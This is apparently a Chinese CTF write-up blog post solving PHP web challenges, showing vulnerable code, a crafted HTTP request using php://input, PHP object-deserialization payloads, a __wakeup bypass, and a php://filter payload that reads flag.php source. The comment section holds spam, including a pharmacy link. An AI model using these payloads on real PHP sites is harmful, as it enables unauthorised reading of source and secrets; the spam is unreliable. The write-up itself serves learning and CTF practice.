if(file_get_contents($txt,'r')==="welcome to the aegis"){
echo "hello friend!
";
$password = unserialize($password);
echo $password;
}else{
echo "something wrong! try it again";
}
这种读取一个文件,内容还必须是welcome to the aegis。我踏马知道什么文件的内容是这个,后来从网上搜了一下可以使用php://input 以POST的方式给他创一个相等。具体的数据包如下:
GET /?txt=php://input&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} HTTP/1.1
Host: hazelshishuaige.club:8200
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f942t8231blhrcqr0hiv367j84
Connection: close
Content-Length: 20
welcome to the aegis
<?php
include "flag.php";
class Index{
private $name1;
private $name2;
protected $age1;
protected $age2;
function getflag($flag){
$name2 = rand(0,999999999);
if($this->name1 === $this->name2){
$age2 = rand(0,999999999);
if($this->age1 === $this->age2){
echo $flag;
}
}
else{
echo "nonono";
}
}
}
if(isset($_GET['poc'])){
$a = unserialize($_GET['poc']);
$a->getflag($flag);
}
else{
highlight_file("index.php");
}
?>
- flag的值位于:flag.php页面中,猜测是注释内容,需要读取源码;
- 注意1:getflag()函数内的name2变量和age2变量与Index类中的私有属性name2和保护属性age2无关,要想在类内访问自己的私有和保护属性,需要使用伪变量this,形如:this->name2或$this->age2;
- 因此:getflag()函数内的if条件语句,起不到任何的过滤作用
- 注意2:私有属性和保护属性在序列化的时候,会出现不可见字符,不能进行复制,反序列化后的结果也会出问题,因此我们需要进行URL编码
- 注意3:浏览器在提交GET参数给后台的之前,会自动把URL编码(若已经提前编码,浏览器不会进行编码了),到达后台后自动进行URL解码
- 要想获得flag–>需要读取flag.php页面的源码
- 要想读取flag.php页面的源码–>需要调用getflag()
- 要想调用getflag()–>需要使其传入的当前类的实例化对象的序列化字符串中的私有属性name1和name2全等且保护属性age1和age2全等
- 要想当前类的实例化对象的私有属性name1和name2全等且保护属性age1和age2全等–>直接赋值即可,因为getflag()内部的name2和age2不会影响到私有属性和保护属性的值
<?php
class Index{
private $name1='a';
private $name2='a';
protected $age1=1;
protected $age2=1;
}
$index = new Index();
echo urlencode(serialize($index));
绕过___wakeup()函数的方法就是使实际的参数个数与序列化的字符串不符。
O:10:"Connection":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
Comments 2 条评论
博主 porn
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
yandanxvurulmus.tz4VMtXuNVjZ
博主 purchase
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
[url=https://ifinasteride.com/]best generic propecia[/url]